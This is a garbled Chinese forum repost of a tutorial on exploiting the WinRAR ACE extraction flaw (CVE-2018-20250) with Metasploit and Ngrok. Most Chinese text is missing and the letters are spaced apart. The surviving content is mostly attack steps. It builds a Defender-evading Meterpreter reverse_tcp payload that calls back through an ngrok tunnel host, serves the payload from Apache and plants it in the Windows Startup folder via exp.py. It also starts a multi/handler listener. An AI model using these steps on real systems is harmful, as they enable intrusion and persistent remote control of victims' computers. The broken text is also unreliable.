搜索

[13854] 2019-03-11_WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2019-03-11_WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线 W i n R A R M e t a s p l o i t + N g r o k 线   F r e e B u f   2 0 1 9 - 0 3 - 1 1 W i n d o w s   W i n R A R   W i n R A R U N A C E V 2 . d l l   2 0 0 5   使 使 + :   h t t p s : / / r e s e a r c h . c h e c k p o i n t . c o m / e x t r a c t i n g - c o d e - e x e c u t i o n - f r o m - w i n r a r / 1 . 1   W i n R A R E X P : h t t p s : / / g i t h u b . c o m / W y A t u / C V E - 2 0 1 8 - 2 0 2 5 0 . g i t W i n R A R   <   5 . 7 0   B e t a   1 B a n d i z i p <   =   6 . 2 . 0 . 0 ( 2 3 4 5 )   <   =   5 . 9 . 8 . 1 0 9 0 7 3 6 0 <   =   4 . 0 . 0 . 1 1 7 0 K a l i L i n u x ( 使 2 0 1 9 . 1 ) n g r o k M e t a s p l o i t ( K a l i L i n u x 2 0 1 9 . 1 M e t a s p l o i t 5 )
1 . 2   h t t p s : / / w w w . n g r o k . c c /   n g r o k T C P I P K a l i L i n u x I P 1 . 3   线 1 . 4   n g r o k K a l i L i n u x L i n u x   6 4 B i t . / s u n n y   c l i e n t i d   [ I D ]
M e t a s p l o i t P a y l o a d   ( W i n d o w s 1 0 d e f e n d e r ) 2 . 1   使 M e t a s p l o i t 5 P a y l o a d m s f c o n s o l e u s e   e v a s i o n / w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e ( m s f 5 ) s h o w   i n f o ( ) s e t   f i l e n a m e   W i n R a r P a y l o a d T e s t . e x e ( P a y l o a d   ) s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p ( P a y l o a d   ) s e t   l h o s t   f r e e . i d c f e n g y e . c o m ( 线 N g r o k ) s e t   l p o r t   1 2 3 5 2 ( N g r o k   ) r u n ( P a y l o a d )
( P a y l o a d : / r o o t / . m s f 4 / l o c a l / W i n R a r P a y l o a d . e x e ) 2 . 2   P a y l o a d a p a c h e 2 2 . 3   2 . 4   访 K a l i L i n u x I P P a y l o a d E X P 2 . 5   e x p . p y c a l c . e x e W i n R a r P a y l o a d . e x e 2 . 6   P y t h o n e x p . p y c p   / r o o t / . m s f 4 / l o c a l / x x x x x . e x e   / v a r / w w w / h t m s e r v i c e   a p a c h e 2   s t a r t
2 . 7   ( ) W i n d o w s 7 3 . 1   P a y l o a d
W i n d o w s 7 : C : U s e r s A d m i n i s t r a t o r A p p D a t a R o a m i n g M i c r o s o f t W i n d o w s S t a r t M e n u P r o g r a m s S t a r t u p M e t a s p l o i t 线 : m s f c o n s o l e u s e   e x p l o i t / m u l t i / h a n d l e r s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p s e t   l h o s t   1 9 2 . 1 6 8 . 0 . 1 0 7 s e t   l p o r t   8 9 8 9 r u n
n g r o k , W i n d o w s 7 m e t a s p l o i t 线 h t t p s : / / w w w . l a n z o u s . c o m / i 3 a 0 i d e   : F r e e B u f 1 .   W i n r a r 7 z 2 .   U N A C E V 2 . d l l
3 .   ( ) e v a s i o n / w i n d o w s / w i n d o w s d e f e n d e r e x e ( W i n d o w s 1 0   D e f e n d e r , ) S h l l e c o d e 使 W i n d o w s R A T ( N j r a t G h o s t ) W i n d o w s 穿 使 " " 使 B G M *   F r e e B u f  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理